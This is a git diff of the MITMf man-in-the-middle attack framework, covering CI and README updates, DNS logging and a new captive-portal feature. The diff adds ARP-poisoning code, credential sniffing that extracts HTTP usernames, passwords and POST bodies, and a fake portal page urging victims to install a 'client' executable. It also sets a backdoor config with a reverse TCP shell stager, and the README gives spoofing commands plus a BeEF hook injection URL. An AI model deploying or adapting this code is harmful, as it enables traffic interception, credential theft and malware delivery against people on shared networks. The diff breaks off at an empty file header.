diff --git a/.coveragerc b/.coveragerc
new file mode 100644
index 0000000..2a138cb
--- /dev/null
+++ b/.coveragerc
@@ -0,0 +1,8 @@
+[run]
+branch = True
+
+[report]
+include = *core*, *libs*, *plugins*
+exclude_lines =
+ pragma: nocover
+ pragma: no cover
diff --git a/.gitignore b/.gitignore
index 0860090..acdb2f6 100644
--- a/.gitignore
+++ b/.gitignore
@@ -57,3 +57,7 @@ docs/_build/
# PyBuilder
target/
+
+# OSX Stuff
+.DS_Store
+._.DS_Store
diff --git a/.travis.yml b/.travis.yml
index 8d2267b..1656a7a 100644
--- a/.travis.yml
+++ b/.travis.yml
@@ -1,11 +1,27 @@
language: python
python:
- "2.7"
-sudo: required
-before_install:
- - "ifconfig"
- - "sudo apt-get update -qq"
- - "sudo apt-get install tcpdump libpcap0.8-dev libnetfilter-queue-dev libssl-dev"
+
+addons:
+ apt:
+ packages:
+ - libpcap0.8-dev
+ - libnetfilter-queue-dev
+ - libssl-dev
+
+notifications:
+ irc:
+ channels:
+ - "irc.freenode.org#MITMf"
+ template:
+ - "%{repository}#%{build_number} (%{branch} - %{commit} - %{commit_subject} : %{author}): %{message}"
+ skip_join: true
+ use_notice: true
install: "pip install -r requirements.txt"
-script: nosetests
\ No newline at end of file
+before_script:
+ - "pip install python-coveralls"
+script:
+ - "nosetests --with-cov"
+after_success:
+ - coveralls
diff --git a/CONTRIBUTORS.md b/CONTRIBUTORS.md
index 117d02f..d0f9f61 100644
--- a/CONTRIBUTORS.md
+++ b/CONTRIBUTORS.md
@@ -1,4 +1,4 @@
-#Intentional contributors (in no particular order)
+# Intentional contributors (in no particular order)
- @rthijssen
- @ivangr0zni (Twitter)
@@ -13,7 +13,7 @@
- @auraltension
- @HAMIDx9
-#Unintentional contributors and/or projects that I stole code from
+# Unintentional contributors and/or projects that I stole code from
- Metasploit Framework's os.js and Javascript Keylogger module
- Responder by Laurent Gaffie
diff --git a/README.md b/README.md
old mode 100644
new mode 100755
index a52fb9a..2b60ea0
--- a/README.md
+++ b/README.md
@@ -3,11 +3,14 @@

[](https://codeclimate.com/github/byt3bl33d3r/MITMf)
[](https://travis-ci.org/byt3bl33d3r/MITMf)
+[](https://coveralls.io/github/byt3bl33d3r/MITMf?branch=master)
-#MITMf
+# MITMf
Framework for Man-In-The-Middle attacks
+**This project is no longer being updated. MITMf was written to address the need, at the time, of a modern tool for performing Man-In-The-Middle attacks. Since then many other tools have been created to fill this space, you should probably be using [Bettercap](https://github.com/bettercap/bettercap) as it is far more feature complete and better maintained.**
+
Quick tutorials, examples and developer updates at: https://byt3bl33d3r.github.io
This tool is based on [sergio-proxy](https://github.com/supernothing/sergio-proxy) and is an attempt to revive and update the project.
@@ -15,7 +18,7 @@ This tool is based on [sergio-proxy](https://github.com/supernothing/sergio-prox
Contact me at:
- Twitter: @byt3bl33d3r
- IRC on Freenode: #MITMf
-- Email: byt3bl33d3r@gmail.com
+- Email: byt3bl33d3r@protonmail.com
**Before submitting issues, please read the relevant [section](https://github.com/byt3bl33d3r/MITMf/wiki/Reporting-a-bug) in the wiki .**
@@ -111,13 +114,33 @@ Inject a JS script:
```python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js```
+Start a captive portal that redirects everything to http://SERVER/PATH:
+
+```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portalurl http://SERVER/PATH```
+
+Start captive portal at http://your-ip/portal.html using default page /portal.html (thx responder) and /CaptiveClient.exe (not included) from the config/captive folder:
+
+```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive```
+
+Same as above but with hostname captive.portal instead of IP (requires captive.portal to resolve to your IP, e.g. via DNS spoof):
+
+```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --use-dns```
+
+Serve a captive portal with an additional SimpleHTTPServer instance serving the LOCALDIR at http://IP:8080 (change port in mitmf.config):
+
+```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portaldir LOCALDIR```
+
+Same as above but with hostname:
+
+```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --portaldir LOCALDIR --use-dns```
+
And much much more!
Of course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc..)
For a complete list of available options, just run ```python mitmf.py --help```
-#Currently available plugins
+# Currently available plugins
- **HTA Drive-By** : Injects a fake update notification and prompts clients to download an HTA application
- **SMBTrap** : Exploits the 'SMB Trap' vulnerability on connected clients
@@ -127,12 +150,22 @@ For a complete list of available options, just run ```python mitmf.py --help```
- **Spoof** : Redirect traffic using ARP, ICMP, DHCP or DNS spoofing
- **BeEFAutorun** : Autoruns BeEF modules based on a client's OS or browser type
- **AppCachePoison** : Performs HTML5 App-Cache poisoning attacks
-- **Ferret-NG** : Transperently hijacks client sessions
+- **Ferret-NG** : Transparently hijacks client sessions
- **BrowserProfiler** : Attempts to enumerate all browser plugins of connected clients
- **FilePwn** : Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy
- **Inject** : Inject arbitrary content into HTML content
- **BrowserSniper** : Performs drive-by attacks on clients with out-of-date browser plugins
- **JSkeylogger** : Injects a Javascript keylogger into a client's webpages
-- **Replace** : Replace arbitary content in HTML content
+- **Replace** : Replace arbitrary content in HTML content
- **SMBAuth** : Evoke SMB challenge-response authentication attempts
- **Upsidedownternet** : Flips images 180 degrees
+- **Captive** : Creates a captive portal, redirecting HTTP requests using 302
+
+# How to fund my tea & sushi reserve
+
+BTC: 1ER8rRE6NTZ7RHN88zc6JY87LvtyuRUJGU
+
+ETH: 0x91d9aDCf8B91f55BCBF0841616A01BeE551E90ee
+
+LTC: LLMa2bsvXbgBGnnBwiXYazsj7Uz6zRe4fr
+
diff --git a/config/captive/portal.html b/config/captive/portal.html
new file mode 100755
index 0000000..80b0cac
--- /dev/null
+++ b/config/captive/portal.html
@@ -0,0 +1,31 @@
+
+
+Captive Portal
+
+
+
+
+
+
+
Client Required
+
+
+
+
- Access has been blocked. Please download and install the new Captive Portal Client in order to access internet resources.
+
+
+
+
+
+
+
+
diff --git a/config/mitmf.conf b/config/mitmf.conf
old mode 100644
new mode 100755
index 6832dce..1e78825
--- a/config/mitmf.conf
+++ b/config/mitmf.conf
@@ -38,6 +38,7 @@
[[[A]]] # Queries for IPv4 address records
*.thesprawl.org=192.168.178.27
+ *.captive.portal=192.168.1.100
[[[AAAA]]] # Queries for IPv6 address records
*.thesprawl.org=2001:db8::1
@@ -75,11 +76,19 @@
#
# Plugin configuration starts here
#
+[Captive]
+
+ # Set Server Port and string if we are serving our own portal from SimpleHTTPServer (80 is already used by default server)
+ Port = 8080
+ ServerString = "Captive Server 1.0"
+
+ # Set the filename served as /CaptivePortal.exe by integrated http server
+ PayloadFilename = config/captive/calc.exe
[Replace]
[[Regex1]]
- 'Google Search' = 'Google yssas'
+ 'Google Search' = '44CON'
[[Regex2]]
"I'm Feeling Lucky" = "I'm Feeling Something In My Pants"
@@ -89,7 +98,7 @@
# Here you can specify the client to hijack sessions from
#
- Client = '192.168.1.26'
+ Client = '10.0.237.91'
[SSLstrip+]
@@ -445,10 +454,10 @@
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
# PATCH_METHOD overwrites PATCH_TYPE, use automatic, replace, or onionduke
PATCH_METHOD = automatic
- HOST = 192.168.1.16
+ HOST = 192.168.20.79
PORT = 8090
# SHELL for use with automatic PATCH_METHOD
- SHELL = iat_reverse_tcp_inline_threaded
+ SHELL = iat_reverse_tcp_stager_threaded
# SUPPLIED_SHELLCODE for use with a user_supplied_shellcode payload
SUPPLIED_SHELLCODE = None
ZERO_CERT = True
@@ -503,7 +512,7 @@
LinuxType = None
WindowsType = ALL
CompressedFiles = False
- #inherits WindowsIntelx32 from ALL
+ #inherits WindowsIntelx86 from ALL
[[[[WindowsIntelx86]]]]
PATCH_DLL = False
ZERO_CERT = True
diff --git a/core/banners.py b/core/banners.py
index 51438c8..a463ffa 100644
--- a/core/banners.py
+++ b/core/banners.py
@@ -65,6 +65,18 @@ banner4 = """
╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝╚═╝
"""
+banner5 = """
+@@@@@@@@@@ @@@ @@@@@@@ @@@@@@@@@@ @@@@@@@@
+@@@@@@@@@@@ @@@ @@@@@@@ @@@@@@@@@@@ @@@@@@@@
+@@! @@! @@! @@! @@! @@! @@! @@! @@!
+!@! !@! !@! !@! !@! !@! !@! !@! !@!
+@!! !!@ @!@ !!@ @!! @!! !!@ @!@ @!!!:!
+!@! ! !@! !!! !!! !@! ! !@! !!!!!:
+!!: !!: !!: !!: !!: !!: !!:
+:!: :!: :!: :!: :!: :!: :!:
+::: :: :: :: ::: :: ::
+ : : : : : : :
+"""
+
def get_banner():
- banners = [banner1, banner2, banner3, banner4]
- return random.choice(banners)
+ return random.choice([banner1, banner2, banner3, banner4, banner5])
diff --git a/core/beefapi.py b/core/beefapi.py
index 7a66797..e427619 100644
--- a/core/beefapi.py
+++ b/core/beefapi.py
@@ -342,6 +342,12 @@ class Session(object):
logs.append(Log(log))
return logs
+ def update(self, options={}):
+ headers = {"Content-Type": "application/json", "charset": "UTF-8"}
+ payload = json.dumps(options)
+ r = requests.post("{}/hooks/update/{}?token={}".format(self.url, self.session, self.token), headers=headers, data=payload)
+ return r.json()
+
def run(self, module_id, options={}):
headers = {"Content-Type": "application/json", "charset": "UTF-8"}
payload = json.dumps(options)
diff --git a/core/configwatcher.py b/core/configwatcher.py
index 7f7b955..95716de 100644
--- a/core/configwatcher.py
+++ b/core/configwatcher.py
@@ -21,7 +21,7 @@ import pyinotify
import threading
from configobj import ConfigObj
-class ConfigWatcher(pyinotify.ProcessEvent):
+class ConfigWatcher(pyinotify.ProcessEvent, object):
@property
def config(self):
diff --git a/core/ferretng/ServerConnection.py b/core/ferretng/ServerConnection.py
index 5cd085d..f35fe2b 100644
--- a/core/ferretng/ServerConnection.py
+++ b/core/ferretng/ServerConnection.py
@@ -110,7 +110,7 @@ class ServerConnection(HTTPClient):
self.isCompressed = True
elif (key.lower()== 'strict-transport-security'):
- log.debug("[ServerConnection] Zapped a strict-trasport-security header")
+ log.debug("[ServerConnection] Zapped a strict-transport-security header")
elif (key.lower() == 'content-length'):
self.contentLength = value
diff --git a/core/mitmfapi.py b/core/mitmfapi.py
index 710ae98..195b8d2 100644
--- a/core/mitmfapi.py
+++ b/core/mitmfapi.py
@@ -75,13 +75,13 @@ class mitmfapi(ConfigWatcher):
if status == "1":
for p in ProxyPlugins().all_plugins:
if (p.name == plugin) and (p not in ProxyPlugins().plugin_list):
- ProxyPlugins().addPlugin(p)
+ ProxyPlugins().add_plugin(p)
return json.dumps({"plugin": plugin, "response": "success"})
elif status == "0":
for p in ProxyPlugins().plugin_list:
if p.name == plugin:
- ProxyPlugins().removePlugin(p)
+ ProxyPlugins().remove_plugin(p)
return json.dumps({"plugin": plugin, "response": "success"})
return json.dumps({"plugin": plugin, "response": "failed"})
@@ -97,4 +97,4 @@ class mitmfapi(ConfigWatcher):
def start(self):
api_thread = threading.Thread(name='mitmfapi', target=self.startFlask)
api_thread.setDaemon(True)
- api_thread.start()
\ No newline at end of file
+ api_thread.start()
diff --git a/core/netcreds.py b/core/netcreds.py
index 5daa6b8..5518852 100644
--- a/core/netcreds.py
+++ b/core/netcreds.py
@@ -41,6 +41,8 @@ NTLMSSP3_re = 'NTLMSSP\x00\x03\x00\x00\x00.+'
# Prone to false+ but prefer that to false-
http_search_re = '((search|query|&q|\?q|search\?p|searchterm|keywords|keyword|command|terms|keys|question|kwd|searchPhrase)=([^&][^&]*))'
+parsing_pcap = False
+
class NetCreds:
version = "1.0"
@@ -51,15 +53,64 @@ class NetCreds:
except Exception as e:
if "Interrupted system call" in e: pass
- def start(self, interface, ip, pcap):
- if pcap:
- for pkt in PcapReader(pcap):
- pkt_parser(pkt)
- sys.exit()
- else:
- t = threading.Thread(name='NetCreds', target=self.sniffer, args=(interface, ip,))
- t.setDaemon(True)
- t.start()
+ def start(self, interface, ip):
+ t = threading.Thread(name='NetCreds', target=self.sniffer, args=(interface, ip,))
+ t.setDaemon(True)
+ t.start()
+
+ def parse_pcap(self, pcap):
+ parsing_pcap=True
+
+ for pkt in PcapReader(pcap):
+ pkt_parser(pkt)
+
+ sys.exit()
+
+def frag_remover(ack, load):
+ '''
+ Keep the FILO OrderedDict of frag loads from getting too large
+ 3 points of limit:
+ Number of ip_ports < 50
+ Number of acks per ip:port < 25
+ Number of chars in load < 5000
+ '''
+ global pkt_frag_loads
+
+ # Keep the number of IP:port mappings below 50
+ # last=False pops the oldest item rather than the latest
+ while len(pkt_frag_loads) > 50:
+ pkt_frag_loads.popitem(last=False)
+
+ # Loop through a deep copy dict but modify the original dict
+ copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
+ for ip_port in copy_pkt_frag_loads:
+ if len(copy_pkt_frag_loads[ip_port]) > 0:
+ # Keep 25 ack:load's per ip:port
+ while len(copy_pkt_frag_loads[ip_port]) > 25:
+ pkt_frag_loads[ip_port].popitem(last=False)
+
+ # Recopy the new dict to prevent KeyErrors for modifying dict in loop
+ copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
+ for ip_port in copy_pkt_frag_loads:
+ # Keep the load less than 75,000 chars
+ for ack in copy_pkt_frag_loads[ip_port]:
+ # If load > 5000 chars, just keep the last 200 chars
+ if len(copy_pkt_frag_loads[ip_port][ack]) > 5000:
+ pkt_frag_loads[ip_port][ack] = pkt_frag_loads[ip_port][ack][-200:]
+
+def frag_joiner(ack, src_ip_port, load):
+ '''
+ Keep a store of previous fragments in an OrderedDict named pkt_frag_loads
+ '''
+ for ip_port in pkt_frag_loads:
+ if src_ip_port == ip_port:
+ if ack in pkt_frag_loads[src_ip_port]:
+ # Make pkt_frag_loads[src_ip_port][ack] = full load
+ old_load = pkt_frag_loads[src_ip_port][ack]
+ concat_load = old_load + load
+ return OrderedDict([(ack, concat_load)])
+
+ return OrderedDict([(ack, load)])
def pkt_parser(pkt):
'''
@@ -127,53 +178,7 @@ def pkt_parser(pkt):
telnet_logins(src_ip_port, dst_ip_port, load, ack, seq)
# HTTP and other protocols that run on TCP + a raw load
- other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt)
-
-def frag_remover(ack, load):
- '''
- Keep the FILO OrderedDict of frag loads from getting too large
- 3 points of limit:
- Number of ip_ports < 50
- Number of acks per ip:port < 25
- Number of chars in load < 5000
- '''
- global pkt_frag_loads
-
- # Keep the number of IP:port mappings below 50
- # last=False pops the oldest item rather than the latest
- while len(pkt_frag_loads) > 50:
- pkt_frag_loads.popitem(last=False)
-
- # Loop through a deep copy dict but modify the original dict
- copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
- for ip_port in copy_pkt_frag_loads:
- if len(copy_pkt_frag_loads[ip_port]) > 0:
- # Keep 25 ack:load's per ip:port
- while len(copy_pkt_frag_loads[ip_port]) > 25:
- pkt_frag_loads[ip_port].popitem(last=False)
-
- # Recopy the new dict to prevent KeyErrors for modifying dict in loop
- copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
- for ip_port in copy_pkt_frag_loads:
- # Keep the load less than 75,000 chars
- for ack in copy_pkt_frag_loads[ip_port]:
- # If load > 5000 chars, just keep the last 200 chars
- if len(copy_pkt_frag_loads[ip_port][ack]) > 5000:
- pkt_frag_loads[ip_port][ack] = pkt_frag_loads[ip_port][ack][-200:]
-
-def frag_joiner(ack, src_ip_port, load):
- '''
- Keep a store of previous fragments in an OrderedDict named pkt_frag_loads
- '''
- for ip_port in pkt_frag_loads:
- if src_ip_port == ip_port:
- if ack in pkt_frag_loads[src_ip_port]:
- # Make pkt_frag_loads[src_ip_port][ack] = full load
- old_load = pkt_frag_loads[src_ip_port][ack]
- concat_load = old_load + load
- return OrderedDict([(ack, concat_load)])
-
- return OrderedDict([(ack, load)])
+ other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt, True)
def telnet_logins(src_ip_port, dst_ip_port, load, ack, seq):
'''
@@ -530,14 +535,14 @@ def irc_logins(full_load, pkt):
msg = 'IRC pass: %s' % pass_search2.group(1)
return msg
-def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt):
+def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt, verbose):
'''
Pull out pertinent info from the parsed HTTP packet data
'''
user_passwd = None
http_url_req = None
method = None
- http_methods = ['GET ', 'POST', 'CONNECT ', 'TRACE ', 'TRACK ', 'PUT ', 'DELETE ', 'HEAD ']
+ http_methods = ['GET ', 'POST ', 'CONNECT ', 'TRACE ', 'TRACK ', 'PUT ', 'DELETE ', 'HEAD ']
http_line, header_lines, body = parse_http_load(full_load, http_methods)
headers = headers_to_dict(header_lines)
if 'host' in headers:
@@ -545,44 +550,51 @@ def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt):
else:
host = ''
- #if http_line != None:
- # method, path = parse_http_line(http_line, http_methods)
- # http_url_req = get_http_url(method, host, path, headers)
- #if http_url_req != None:
- #printer(src_ip_port, None, http_url_req)
+ if parsing_pcap is True:
- # Print search terms
- searched = get_http_searches(http_url_req, body, host)
- if searched:
- printer(src_ip_port, dst_ip_port, searched)
+ if http_line != None:
+ method, path = parse_http_line(http_line, http_methods)
+ http_url_req = get_http_url(method, host, path, headers)
+ if http_url_req != None:
+ if verbose == False:
+ if len(http_url_req) > 98:
+ http_url_req = http_url_req[:99] + '...'
+ printer(src_ip_port, None, http_url_req)
- #We dont need this cause its being taking care of by the proxy
-
- #Print user/pwds
- #if body != '':
- # user_passwd = get_login_pass(body)
- # if user_passwd != None:
- # try:
- # http_user = user_passwd[0].decode('utf8')
- # http_pass = user_passwd[1].decode('utf8')
- # # Set a limit on how long they can be prevent false+
- # if len(http_user) > 75 or len(http_pass) > 75:
- # return
- # user_msg = 'HTTP username: %s' % http_user
- # printer(src_ip_port, dst_ip_port, user_msg)
- # pass_msg = 'HTTP password: %s' % http_pass
- # printer(src_ip_port, dst_ip_port, pass_msg)
- # except UnicodeDecodeError:
- # pass
+ # Print search terms
+ searched = get_http_searches(http_url_req, body, host)
+ if searched:
+ printer(src_ip_port, dst_ip_port, searched)
- # Print POST loads
- # ocsp is a common SSL post load that's never interesting
- #if method == 'POST' and 'ocsp.' not in host:
- # try:
- # msg = 'POST load: %s' % body.encode('utf8')
- # printer(src_ip_port, None, msg)
- # except UnicodeDecodeError:
- # pass
+ # Print user/pwds
+ if body != '':
+ user_passwd = get_login_pass(body)
+ if user_passwd != None:
+ try:
+ http_user = user_passwd[0].decode('utf8')
+ http_pass = user_passwd[1].decode('utf8')
+ # Set a limit on how long they can be prevent false+
+ if len(http_user) > 75 or len(http_pass) > 75:
+ return
+ user_msg = 'HTTP username: %s' % http_user
+ printer(src_ip_port, dst_ip_port, user_msg)
+ pass_msg = 'HTTP password: %s' % http_pass
+ printer(src_ip_port, dst_ip_port, pass_msg)
+ except UnicodeDecodeError:
+ pass
+
+ # Print POST loads
+ # ocsp is a common SSL post load that's never interesting
+ if method == 'POST' and 'ocsp.' not in host:
+ try:
+ if verbose == False and len(body) > 99:
+ # If it can't decode to utf8 we're probably not interested in it
+ msg = 'POST load: %s...' % body[:99].encode('utf8')
+ else:
+ msg = 'POST load: %s' % body.encode('utf8')
+ printer(src_ip_port, None, msg)
+ except UnicodeDecodeError:
+ pass
# Kerberos over TCP
decoded = Decode_Ip_Packet(str(pkt)[14:])
@@ -662,7 +674,10 @@ def parse_basic_auth(src_ip_port, dst_ip_port, headers, authorization_header):
b64_auth_re = re.match('basic (.+)', header_val, re.IGNORECASE)
if b64_auth_re != None:
basic_auth_b64 = b64_auth_re.group(1)
- basic_auth_creds = base64.decodestring(basic_auth_b64)
+ try:
+ basic_auth_creds = base64.decodestring(basic_auth_b64)
+ except Exception:
+ return
msg = 'Basic Authentication: %s' % basic_auth_creds
printer(src_ip_port, dst_ip_port, msg)
@@ -713,15 +728,13 @@ def headers_to_dict(header_lines):
Convert the list of header lines into a dictionary
'''
headers = {}
- # Incomprehensible list comprehension flattens list of headers
- # that are each split at ': '
- # http://stackoverflow.com/a/406296
- headers_list = [x for line in header_lines for x in line.split(': ', 1)]
- headers_dict = dict(zip(headers_list[0::2], headers_list[1::2]))
- # Make the header key (like "Content-Length") lowercase
- for header in headers_dict:
- headers[header.lower()] = headers_dict[header]
-
+ for line in header_lines:
+ lineList=line.split(': ', 1)
+ key=lineList[0].lower()
+ if len(lineList)>1:
+ headers[key]=lineList[1]
+ else:
+ headers[key]=""
return headers
def parse_http_line(http_line, http_methods):
@@ -794,9 +807,12 @@ def parse_netntlm_chal(headers, chal_header, ack):
header_val2 = header_val2.split(' ', 1)
# The header value can either start with NTLM or Negotiate
if header_val2[0] == 'NTLM' or header_val2[0] == 'Negotiate':
- msg2 = header_val2[1]
+ try:
+ msg2 = header_val2[1]
+ except IndexError:
+ return
msg2 = base64.decodestring(msg2)
- parse_ntlm_chal(ack, msg2)
+ parse_ntlm_chal(msg2, ack)
def parse_ntlm_chal(msg2, ack):
'''
@@ -885,10 +901,10 @@ def get_login_pass(body):
'alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname',
'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename',
'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username',
- 'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in']
+ 'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in', 'usuario']
passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword',
'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password'
- 'passwort', 'passwrd', 'wppassword', 'upasswd']
+ 'passwort', 'passwrd', 'wppassword', 'upasswd','senha','contrasena']
for login in userfields:
login_re = re.search('(%s=[^&]+)' % login, body, re.IGNORECASE)
diff --git a/core/packetfilter.py b/core/packetfilter.py
index e8f0d5d..cd4ad09 100644
--- a/core/packetfilter.py
+++ b/core/packetfilter.py
@@ -1,5 +1,3 @@
-import threading
-
from core.utils import set_ip_forwarding, iptables
from core.logger import logger
from scapy.all import *
@@ -19,22 +17,21 @@ class PacketFilter:
iptables().NFQUEUE()
self.nfqueue = NetfilterQueue()
- self.nfqueue.bind(1, self.modify)
+ self.nfqueue.bind(0, self.modify)
- t = threading.Thread(name='packetparser', target=self.nfqueue.run)
- t.setDaemon(True)
- t.start()
+ self.nfqueue.run()
def modify(self, pkt):
#log.debug("Got packet")
data = pkt.get_payload()
packet = IP(data)
- try:
- execfile(self.filter)
- except Exception:
- log.debug("Error occurred in filter")
- print_exc()
+ for filter in self.filter:
+ try:
+ execfile(filter)
+ except Exception:
+ log.debug("Error occurred in filter", filter)
+ print_exc()
pkt.set_payload(str(packet)) #set the packet content to our modified version
pkt.accept() #accept the packet
@@ -42,4 +39,4 @@ class PacketFilter:
def stop(self):
self.nfqueue.unbind()
set_ip_forwarding(0)
- iptables().flush()
\ No newline at end of file
+ iptables().flush()
diff --git a/core/poisoners/ARP.py b/core/poisoners/ARP.py
index 24e0b0f..a70af0f 100644
--- a/core/poisoners/ARP.py
+++ b/core/poisoners/ARP.py
@@ -214,8 +214,8 @@ class ARPpoisoner:
if targetmac is not None:
try:
#log.debug("Poisoning {} <-> {}".format(targetip, self.gatewayip))
- self.s.send(ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op=arpmode))
- self.s.send(ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op=arpmode))
+ self.s2.send(Ether(src=self.mymac, dst=targetmac)/ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op=arpmode))
+ self.s2.send(Ether(src=self.mymac, dst=self.gatewaymac)/ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op=arpmode))
except Exception as e:
if "Interrupted system call" not in e:
log.error("Exception occurred while poisoning {}: {}".format(targetip, e))
@@ -242,8 +242,8 @@ class ARPpoisoner:
log.info("Restoring connection {} <-> {} with {} packets per host".format(targetip, self.gatewayip, count))
try:
for i in range(0, count):
- self.s.send(ARP(op="is-at", pdst=self.gatewayip, psrc=targetip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=targetmac))
- self.s.send(ARP(op="is-at", pdst=targetip, psrc=self.gatewayip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=self.gatewaymac))
+ self.s2.send(Ether(src=targetmac, dst='ff:ff:ff:ff:ff:ff')/ARP(op="is-at", pdst=self.gatewayip, psrc=targetip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=targetmac))
+ self.s2.send(Ether(src=self.gatewaymac, dst='ff:ff:ff:ff:ff:ff')/ARP(op="is-at", pdst=targetip, psrc=self.gatewayip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=self.gatewaymac))
except Exception as e:
if "Interrupted system call" not in e:
log.error("Exception occurred while poisoning {}: {}".format(targetip, e))
diff --git a/core/poisoners/DHCP.py b/core/poisoners/DHCP.py
index cd6ff20..b46cf54 100644
--- a/core/poisoners/DHCP.py
+++ b/core/poisoners/DHCP.py
@@ -79,7 +79,7 @@ class DHCPpoisoner():
return 'stored', client_ip
net = IPNetwork(self.ip_address + '/24')
- return 'generated', random.choice(list(net))
+ return 'generated', str(random.choice(list(net)))
def dhcp_callback(self, resp):
if resp.haslayer(DHCP):
diff --git a/core/proxyplugins.py b/core/proxyplugins.py
index efb1833..ff4390e 100644
--- a/core/proxyplugins.py
+++ b/core/proxyplugins.py
@@ -82,7 +82,10 @@ class ProxyPlugins:
self.plugin_list.remove(p)
log.debug("Removing {} plugin".format(p.name))
for mthd,pmthd in self.mthdDict.iteritems():
- self.plugin_mthds[mthd].remove(p)
+ try:
+ self.plugin_mthds[mthd].remove(getattr(p,pmthd))
+ except KeyError:
+ pass #nothing to remove
def hook(self):
'''Magic to hook various function calls in sslstrip'''
@@ -108,9 +111,10 @@ class ProxyPlugins:
log.debug("hooking {}()".format(fname))
#calls any plugin that has this hook
try:
- for f in self.plugin_mthds[fname]:
- a = f(**args)
- if a != None: args = a
+ if self.plugin_mthds:
+ for f in self.plugin_mthds[fname]:
+ a = f(**args)
+ if a != None: args = a
except Exception as e:
#This is needed because errors in hooked functions won't raise an Exception + Traceback (which can be infuriating)
log.error("Exception occurred in hooked function")
diff --git a/core/servers/DNS.py b/core/servers/DNS.py
index 54f1889..0599e7b 100755
--- a/core/servers/DNS.py
+++ b/core/servers/DNS.py
@@ -48,6 +48,12 @@ from IPy import IP
formatter = logging.Formatter("%(asctime)s %(clientip)s [DNS] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("DNSChef", formatter)
+dnslog = logging.getLogger('dnslog')
+handler = logging.FileHandler('./logs/dns/dns.log',)
+handler.setFormatter(formatter)
+dnslog.addHandler(handler)
+dnslog.setLevel(logging.INFO)
+
# DNSHandler Mixin. The class contains generic functions to parse DNS requests and
# calculate an appropriate response based on user parameters.
class DNSHandler():
@@ -69,6 +75,7 @@ class DNSHandler():
except Exception as e:
log.info("Error: invalid DNS request", extra=clientip)
+ dnslog.info("Error: invalid DNS request", extra=clientip)
else:
# Only Process DNS Queries
@@ -113,6 +120,7 @@ class DNSHandler():
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q)
log.info("Cooking the response of type '{}' for {} to {}".format(qtype, qname, fake_record), extra=clientip)
+ dnslog.info("Cooking the response of type '{}' for {} to {}".format(qtype, qname, fake_record), extra=clientip)
# IPv6 needs additional work before inclusion:
if qtype == "AAAA":
@@ -182,6 +190,7 @@ class DNSHandler():
elif qtype == "*" and not None in fake_records.values():
log.info("Cooking the response of type '{}' for {} with {}".format("ANY", qname, "all known fake records."), extra=clientip)
+ dnslog.info("Cooking the response of type '{}' for {} with {}".format("ANY", qname, "all known fake records."), extra=clientip)
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap,qr=1, aa=1, ra=1), q=d.q)
@@ -257,6 +266,7 @@ class DNSHandler():
# Proxy the request
else:
log.debug("Proxying the response of type '{}' for {}".format(qtype, qname), extra=clientip)
+ dnslog.info("Proxying the response of type '{}' for {}".format(qtype, qname), extra=clientip)
nameserver_tuple = random.choice(nameservers).split('#')
response = self.proxyrequest(data, *nameserver_tuple)
@@ -339,6 +349,7 @@ class DNSHandler():
except Exception as e:
log.warning("Could not proxy request: {}".format(e), extra=clientip)
+ dnslog.info("Could not proxy request: {}".format(e), extra=clientip)
else:
return reply
@@ -346,6 +357,7 @@ class DNSHandler():
clientip = {'clientip': self.client_address[0]}
log.info("Resolving '{}' to '{}' for HSTS bypass".format(fake_domain, real_domain), extra=clientip)
+ dnslog.info("Resolving '{}' to '{}' for HSTS bypass".format(fake_domain, real_domain), extra=clientip)
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q)
@@ -354,7 +366,8 @@ class DNSHandler():
#First proxy the request with the real domain
q = DNSRecord.question(real_domain).pack()
r = self.proxyrequest(q, *nameserver_tuple)
-
+ if r is None: return None
+
#Parse the answer
dns_rr = DNSRecord.parse(r).rr
@@ -449,7 +462,12 @@ class DNSChef(ConfigWatcher):
# Use alternative DNS servers
if config['nameservers']:
- self.nameservers = config['nameservers'].split(',')
+ self.nameservers = []
+
+ if type(config['nameservers']) is str:
+ self.nameservers.append(config['nameservers'])
+ elif type(config['nameservers']) is list:
+ self.nameservers = config['nameservers']
for section in config.sections:
diff --git a/core/servers/HTTP.py b/core/servers/HTTP.py
